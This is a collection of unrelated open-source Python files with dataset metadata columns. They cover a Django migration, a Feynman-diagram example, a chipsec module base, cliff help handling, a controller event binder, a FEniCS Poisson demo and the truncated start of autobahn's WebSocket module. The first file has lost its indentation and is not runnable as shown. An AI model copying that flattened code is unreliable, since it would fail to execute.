EBI-Metagenomics/emgapi | emgapi/migrations/0028_auto_20200706_1823.py | 1 | 1069 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2020-06-16 12:02
from __future__ import unicode_literals
from django.db import migrations
def add_checksum_algorithms(apps, schema_editor):
"""
Add hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
ChecksumAlgorithms.objects.get_or_create(name=alg)
def remove_checksum_algorithms(apps, schema_editor):
"""
Remove hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
try:
ChecksumAlgorithms.objects.get(name=alg).delete()
except ChecksumAlgorithms.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('emgapi', '0027_auto_20200706_1823'),
]
operations = [
migrations.RunPython(add_checksum_algorithms, reverse_code=remove_checksum_algorithms)
]
| apache-2.0 | 3,405,595,739,773,955,600 | 24.452381 | 94 | 0.637979 | false |
itoijala/pyfeyner | examples/pyfeyn-test3.py | 1 | 2416 | #!/usr/bin/env python2
#
# pyfeyner - a simple Python interface for making Feynman diagrams.
# Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel
# Copyright (C) 2013 Ismo Toijala
#
# pyfeyner is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyfeyner is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with pyfeyner; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## A B-meson colour-suppressed penguin decay diagram
# _
# in1 ------(_)------() out1a
# \ ____() out1b
# \(____
# () out2a
# in2 ---------------() out2b
#
from pyfeyner.user import *
import pyx
fd = FeynDiagram()
in1 = Point(1, 7)
loop_in = Vertex(4, 7)
loop_out = Vertex(7, 7)
out1a = Point(11, 7)
out1b = Point(11, 5)
in2 = Point(1, 0)
out2a = Point(11, 2)
out2b = Point(11, 0)
out1c = Vertex(out1b.x() - 2, out1b.y())
out1d = Vertex(out2a.x() - 2, out2a.y())
vtx = Vertex(out1c.midpoint(out1d).x() - 1.5, out1c.midpoint(out1d).y())
fd.add(Fermion(out2b, in2).addArrow().addLabel(r"\APdown"))
fd.add(Fermion(in1, loop_in).addArrow().addLabel(r"\Pbottom"))
fd.add(Fermion(loop_out, out1a).addArrow().addLabel(r"\Pstrange"))
fd.add(Photon(loop_in, loop_out).bend(-1.5).addLabel(r"\PWplus"))
f_loop, = fd.add(Fermion(loop_in, loop_out).bend(+1.5).addArrow() \
.addLabel(r"\Pup,\,\Pcharm,\,\Ptop"))
fd.add(Photon(f_loop.fracpoint(0.6), vtx).addLabel(r"\Pphoton/\PZ", displace=0.5).bend(0.5))
fd.add(Fermion(out1b, out1c).addArrow(0.8).addLabel(r"\APup"))
fd.add(Fermion(out1c, out1d).arcThru(vtx))
fd.add(Fermion(out1d, out2a).addArrow(0.2).addLabel(r"\Pup"))
fd.add(Ellipse(x=1, y=3.5, xradius=1, yradius=3.5).setFillStyle(pyx.pattern.crosshatched(0.1, 45)))
fd.add(Ellipse(x=11, y=6, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.add(Ellipse(x=11, y=1, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.draw("pyfeyn-test3.pdf")
| gpl-2.0 | 8,639,295,022,185,520,000 | 36.75 | 99 | 0.678394 | false |
johnloucaides/chipsec | chipsec/module_common.py | 1 | 3593 | #!/usr/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
# (c) 2010-2012 Intel Corporation
#
# -------------------------------------------------------------------------------
"""
Common include file for modules
"""
import platform
import string
import sys
import os
from time import localtime, strftime
import chipsec.logger
import chipsec.chipset
import chipsec.defines
class ModuleResult:
FAILED = 0
PASSED = 1
WARNING = 2
SKIPPED = 3
DEPRECATED = 4
INFORMATION = 5
ERROR = -1
ModuleResultName = {
ModuleResult.FAILED: "Failed",
ModuleResult.PASSED: "Passed",
ModuleResult.WARNING: "Warning",
ModuleResult.SKIPPED: "Skipped",
ModuleResult.DEPRECATED: "Deprecated",
ModuleResult.INFORMATION: "Information",
ModuleResult.ERROR: "Error"
}
def getModuleResultName(res):
return ModuleResultName[res] if res in ModuleResultName else ModuleResultName[ModuleResult.ERROR]
class BaseModule(object):
def __init__(self):
self.cs = chipsec.chipset.cs()
self.logger = chipsec.logger.logger()
self.res = ModuleResult.PASSED
def is_supported(self):
"""
This method should be overwritten by the module returning True or False
depending whether or not this module is supported in the currently running
platform.
To access the currently running platform use
>>> self.cs.get_chipset_id()
"""
return True
def update_res(self, value):
if self.res == ModuleResult.WARNING:
if value == ModuleResult.FAILED \
or value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.FAILED:
if value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.INFORMATION:
self.res = value
else: # PASSED or SKIPPED or DEPRECATED
self.res = value
def run(self, module_argv):
raise NotImplementedError('sub class should overwrite the run() method')
MTAG_BIOS = "BIOS"
MTAG_SMM = "SMM"
MTAG_SECUREBOOT = "SECUREBOOT"
MTAG_HWCONFIG = "HWCONFIG"
MTAG_CPU = "CPU"
##! [Available Tags]
MTAG_METAS = {
MTAG_BIOS: "System Firmware (BIOS/UEFI) Modules",
MTAG_SMM: "System Management Mode (SMM) Modules",
MTAG_SECUREBOOT: "Secure Boot Modules",
MTAG_HWCONFIG: "Hardware Configuration Modules",
MTAG_CPU: "CPU Modules",
}
##! [Available Tags]
MODULE_TAGS = dict( [(_tag, []) for _tag in MTAG_METAS])
#
# Common module command line options
#
OPT_MODIFY = 'modify'
| gpl-2.0 | 2,244,424,559,796,795,000 | 27.515873 | 101 | 0.629001 | false |
mbollmann/perceptron | mmb_perceptron/feature_extractor/generator/generative_extractor.py | 1 | 3342 | # -*- coding: utf-8 -*-
import numpy as np
from .. import FeatureExtractor
class GenerativeExtractor(FeatureExtractor):
"""Abstract base class for a generative feature extractor.
Compared to simple feature extractors, generators perform the additional
task of generating class label candidates. This means that they don't
return a single feature vector, but a dictionary mapping candidate classes
(for the classifier) to their respective feature vectors.
In terms of the perceptron algorithm, they combine the GEN() and Phi()
functions in a single object for ease of implementation.
"""
def _rebind_methods(self, status):
super(GenerativeExtractor, self)._rebind_methods(status)
if status:
self.generate = self._generate_sequenced
self.generate_vector = self._generate_vector_sequenced
else:
self.generate = self._generate_independent
self.generate_vector = self._generate_vector_independent
def _generate_independent(self, x, truth=None):
"""Return candidates and their feature representations.
Should return a tuple (F, C), where F is a list of feature
representations, and C is a list of class labels so that C[i] is the
class label belonging to the feature representation F[i].
During training, the **first element in these lists** is considered by
the perceptron to be the **correct class label** for this data point.
If the parameter 'truth' is supplied, it indicates the gold-standard
best candidate according to the training data; however, it is up to the
generator function whether to include this value as the first element of
the feature representations (thereby making the **gold standard** the
correct class label for the perceptron learner) or generate the
candidates independently and select an **oracle-best** class label from
those.
"""
raise NotImplementedError("function not implemented")
def _generate_sequenced(self, seq, pos, history=None, truth=None):
raise NotImplementedError("function not implemented")
def _generate_vector_independent(self, x, truth=None, grow=True):
"""Return candidates and their feature representations.
Identical to _generate_independent(), except that F is now a matrix of
numerical feature vectors.
"""
(features, labels) = self._generate_independent(x, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
def _generate_vector_sequenced(self, seq, pos, history=None, truth=None, grow=True):
(features, labels) = \
self._generate_sequenced(seq, pos, history=history, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
| mit | -3,316,705,741,891,611,600 | 44.162162 | 88 | 0.666966 | false |
openstack/cliff | cliff/help.py | 1 | 4846 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import inspect
import traceback
from . import command
class HelpExit(SystemExit):
"""Special exception type to trigger quick exit from the application
We subclass from SystemExit to preserve API compatibility for
anything that used to catch SystemExit, but use a different class
so that cliff's Application can tell the difference between
something trying to hard-exit and help saying it's done.
"""
class HelpAction(argparse.Action):
"""Provide a custom action so the -h and --help options
to the main app will print a list of the commands.
The commands are determined by checking the CommandManager
instance, passed in as the "default" value for the action.
"""
def __call__(self, parser, namespace, values, option_string=None):
app = self.default
parser.print_help(app.stdout)
app.stdout.write('\nCommands:\n')
dists_by_module = command._get_distributions_by_modules()
def dist_for_obj(obj):
name = inspect.getmodule(obj).__name__.partition('.')[0]
return dists_by_module.get(name)
app_dist = dist_for_obj(app)
command_manager = app.command_manager
for name, ep in sorted(command_manager):
try:
factory = ep.load()
except Exception:
app.stdout.write('Could not load %r\n' % ep)
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
try:
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(factory.__init__).args:
kwargs['cmd_name'] = name
cmd = factory(app, None, **kwargs)
if cmd.deprecated:
continue
except Exception as err:
app.stdout.write('Could not instantiate %r: %s\n' % (ep, err))
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
one_liner = cmd.get_description().split('\n')[0]
dist_name = dist_for_obj(factory)
if dist_name and dist_name != app_dist:
dist_info = ' (' + dist_name + ')'
else:
dist_info = ''
app.stdout.write(' %-13s %s%s\n' % (name, one_liner, dist_info))
raise HelpExit()
class HelpCommand(command.Command):
"""print detailed help for another command
"""
def get_parser(self, prog_name):
parser = super(HelpCommand, self).get_parser(prog_name)
parser.add_argument('cmd',
nargs='*',
help='name of the command',
)
return parser
def take_action(self, parsed_args):
if parsed_args.cmd:
try:
the_cmd = self.app.command_manager.find_command(
parsed_args.cmd,
)
cmd_factory, cmd_name, search_args = the_cmd
except ValueError:
# Did not find an exact match
cmd = parsed_args.cmd[0]
fuzzy_matches = [k[0] for k in self.app.command_manager
if k[0].startswith(cmd)
]
if not fuzzy_matches:
raise
self.app.stdout.write('Command "%s" matches:\n' % cmd)
for fm in sorted(fuzzy_matches):
self.app.stdout.write(' %s\n' % fm)
return
self.app_args.cmd = search_args
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(cmd_factory.__init__).args:
kwargs['cmd_name'] = cmd_name
cmd = cmd_factory(self.app, self.app_args, **kwargs)
full_name = (cmd_name
if self.app.interactive_mode
else ' '.join([self.app.NAME, cmd_name])
)
cmd_parser = cmd.get_parser(full_name)
cmd_parser.print_help(self.app.stdout)
else:
action = HelpAction(None, None, default=self.app)
action(self.app.parser, self.app.options, None, None)
return 0
| apache-2.0 | -4,748,475,090,079,885,000 | 37.768 | 79 | 0.554065 | false |
ApproxEng/approxeng.input | src/python/approxeng/input/selectbinder.py | 1 | 6065 | from functools import reduce
from select import select
from threading import Thread
import approxeng.input.sys as sys
from approxeng.input.controllers import *
EV_KEY = 1
EV_REL = 2
EV_ABS = 3
class ControllerResource:
"""
General resource which binds one or more controllers on entry and unbinds the event listening thread on exit.
"""
def __init__(self, *requirements, print_events=False, **kwargs):
"""
Create a new resource to bind and access one or more controllers. If no additional arguments are supplied this
will find the first controller of any kind enabled by the library. Otherwise the requirements must be provided
as a list of ControllerRequirement
:param ControllerRequirement requirements:
ControllerRequirement instances used, in order, to find and bind controllers. If empty this will
be equivalent to supplying a single unfiltered requirement and will match the first specified controller.
:param bool print_events:
Defaults to False, if set to True then all events picked up by the binder will be printed to stdout. Use
this when you're trying to figure out what events correspond to what axes and buttons!
:param kwargs:
Any addition keyword arguments are passed to the constructors for the controller classes. This is useful
particularly to specify e.g. dead and hot zone ranges on discovery.
:raises ControllerNotFoundError:
If the requirement can't be satisfied, or no requirements are specified but there aren't any controllers.
"""
self.discoveries = find_matching_controllers(*requirements, **kwargs)
self.unbind = None
self.print_events = print_events
def __enter__(self):
"""
Called on entering the resource block, returns the controller passed into the constructor.
"""
self.unbind = bind_controllers(*self.discoveries, print_events=self.print_events)
if len(self.discoveries) == 1:
return self.discoveries[0].controller
else:
return tuple(discovery.controller for discovery in self.discoveries)
def __exit__(self, exc_type, exc_value, traceback):
"""
Called on resource exit, unbinds the controller, removing the listening thread.
"""
self.unbind()
def bind_controllers(*discoveries, print_events=False):
"""
Bind a controller or controllers to a set of evdev InputDevice instances, starting a thread to keep those
controllers in sync with the state of the hardware.
:param ControllerDiscovery discoveries:
ControllerDiscovery instances specifying the controllers and their associated input devices
:param bool print_events:
Defaults to False, if set to True then all events picked up by this binder will be printed to stdout
:return:
A function which can be used to stop the event reading thread and unbind from the device
"""
discoveries = list(discoveries)
class SelectThread(Thread):
def __init__(self):
Thread.__init__(self, name='evdev select thread')
self.daemon = True
self.running = True
self.device_to_controller_discovery = {}
for discovery in discoveries:
for d in discovery.devices:
self.device_to_controller_discovery[d.fn] = discovery
self.all_devices = reduce(lambda x, y: x + y, [discovery.devices for discovery in discoveries])
def run(self):
for discovery in discoveries:
discovery.controller.device_unique_name = discovery.name
while self.running:
try:
r, w, x = select(self.all_devices, [], [], 0.5)
for fd in r:
active_device = fd
controller_discovery = self.device_to_controller_discovery[active_device.fn]
controller = controller_discovery.controller
controller_devices = controller_discovery.devices
prefix = None
if controller.node_mappings is not None and len(controller_devices) > 1:
try:
prefix = controller.node_mappings[active_device.name]
except KeyError:
pass
for event in active_device.read():
if print_events:
print(event)
if event.type == EV_ABS or event.type == EV_REL:
controller.axes.axis_updated(event, prefix=prefix)
elif event.type == EV_KEY:
# Button event
if event.value == 1:
# Button down
controller.buttons.button_pressed(event.code, prefix=prefix)
elif event.value == 0:
# Button up
controller.buttons.button_released(event.code, prefix=prefix)
except Exception as e:
self.stop(e)
def stop(self, exception=None):
for discovery in discoveries:
discovery.controller.device_unique_name = None
discovery.controller.exception = exception
self.running = False
polling_thread = SelectThread()
# Force an update of the LED and battery system cache
sys.scan_cache(force_update=True)
for device in polling_thread.all_devices:
device.grab()
def unbind():
polling_thread.stop()
for dev in polling_thread.all_devices:
try:
dev.ungrab()
except IOError:
pass
polling_thread.start()
return unbind
| apache-2.0 | -2,654,246,842,321,006,600 | 40.541096 | 118 | 0.591096 | false |
bcgov/gwells | app/backend/submissions/data_migrations.py | 1 | 1059 | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from gwells.codes import CodeFixture
def well_activity_code():
fixture = 'migrations/well_activity_codes.json'
fixture_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), fixture)
return CodeFixture(fixture_path)
def load_well_activity_codes(apps, schema_editor):
return well_activity_code().load_fixture(apps, schema_editor)
def unload_well_activity_codes(apps, schema_editor):
return well_activity_code().unload_fixture(apps, schema_editor) | apache-2.0 | 1,116,388,698,056,418,700 | 35.551724 | 85 | 0.738432 | false |
akshmakov/Dolfin-Fijee-Fork | test/unit/book/python/chapter_1_files/stationary/poisson/d2_p2D.py | 1 | 1457 | """
FEniCS tutorial demo program: Poisson equation with Dirichlet conditions.
As d1_p2D.py, but chosing linear solver and preconditioner is demonstrated.
-Laplace(u) = f on the unit square.
u = u0 on the boundary.
u0 = u = 1 + x^2 + 2y^2, f = -6.
"""
from dolfin import *
# Create mesh and define function space
mesh = UnitSquareMesh(60, 40)
V = FunctionSpace(mesh, 'Lagrange', 1)
# Define boundary conditions
u0 = Expression('1 + x[0]*x[0] + 2*x[1]*x[1]')
def u0_boundary(x, on_boundary):
return on_boundary
bc = DirichletBC(V, u0, u0_boundary)
# Define variational problem
u = TrialFunction(V)
v = TestFunction(V)
f = Constant(-6.0)
a = inner(nabla_grad(u), nabla_grad(v))*dx
L = f*v*dx
# Compute solution
u = Function(V)
info(parameters, True)
prm = parameters['krylov_solver'] # short form
prm['absolute_tolerance'] = 1E-5
prm['relative_tolerance'] = 1E-3
prm['maximum_iterations'] = 1000
#prm['preconditioner']['ilu']['fill_level'] = 0
print parameters['linear_algebra_backend']
#set_log_level(PROGRESS)
set_log_level(DEBUG)
solve(a == L, u, bc,
solver_parameters={'linear_solver': 'cg',
'preconditioner': 'ilu'})
# Alternative syntax
solve(a == L, u, bc,
solver_parameters=dict(linear_solver='cg',
preconditioner='ilu'))
# Plot solution and mesh
#plot(u)
#plot(mesh)
# Dump solution to file in VTK format
file = File('poisson.pvd')
file << u
# Hold plot
interactive()
| gpl-3.0 | -481,046,481,958,258,050 | 22.885246 | 75 | 0.663693 | false |
danielfaust/AutobahnPython | autobahn/autobahn/websocket.py | 1 | 140218 | ###############################################################################
##
## Copyright 2011,2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
from twisted.internet import reactor, protocol
from twisted.python import log
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from array import array
from collections import deque
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, XorMaskerSimple, XorMaskerShifted1
from httpstatus import *
import autobahn # need autobahn.version
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
Create a WbeSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSockets ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
def parseWsUrl(url):
"""
Parses as WebSocket URL into it's components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
params is the /query) component properly unescaped and returned as dictionary.
:param url: A valid WebSocket URL, i.e. ws://localhost:9000/myresource?param1=23¶m2=666
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSockets connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ClientContextFactory instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which provides twisted.interface.IConnector.
"""
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that provides twisted.interface.IListeningPort.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
class FrameHeader:
"""
Thin-wrapper for storing WebSockets frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException():
"""
Throw an instance of this class to deny a WebSockets connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
class ConnectionRequest():
"""
Thin-wrapper for WebSockets connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSockets
client establishes a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to "/myservice".
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to {'foo': ['23', '66'], 'bar': ['2']}.
:type params: dict of arrays of strings
:param version: The WebSockets protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSockets origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSockets (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSockets extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSockets connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSockets
client has established a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSockets protocol version that is spoken.
:type version: int
:param protocol: The WebSockets (sub)protocol in use.
:type protocol: str
:param extensions: The WebSockets extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of a HTTP request header (the data up to the \n\n line) into a pair
of status line and HTTP headers dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSockets. This class is used by both WebSocket
client and server protocol version. It is unusable standalone, for example
the WebSockets initial handshake is implemented in derived class differently
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSockets protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 10
"""
Default WebSockets protocol spec version this implementation speaks.
We use Hybi-10, since this is what is currently targeted by widely distributed
browsers (namely Firefox 8 and the like).
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455.
"""
QUEUED_WRITE_DELAY = 0.00001
"""For synched/chopped writes, this is the reactor reentry delay in seconds."""
PAYLOAD_LEN_XOR_BREAKEVEN = 128
"""Tuning parameter which chooses XORer used for masking/unmasking based on
payload length."""
MESSAGE_TYPE_TEXT = 1
"""WebSockets text message type (UTF-8 payload)."""
MESSAGE_TYPE_BINARY = 2
"""WebSockets binary message type (arbitrary binary payload)."""
## WebSockets protocol state:
## STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSockets protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
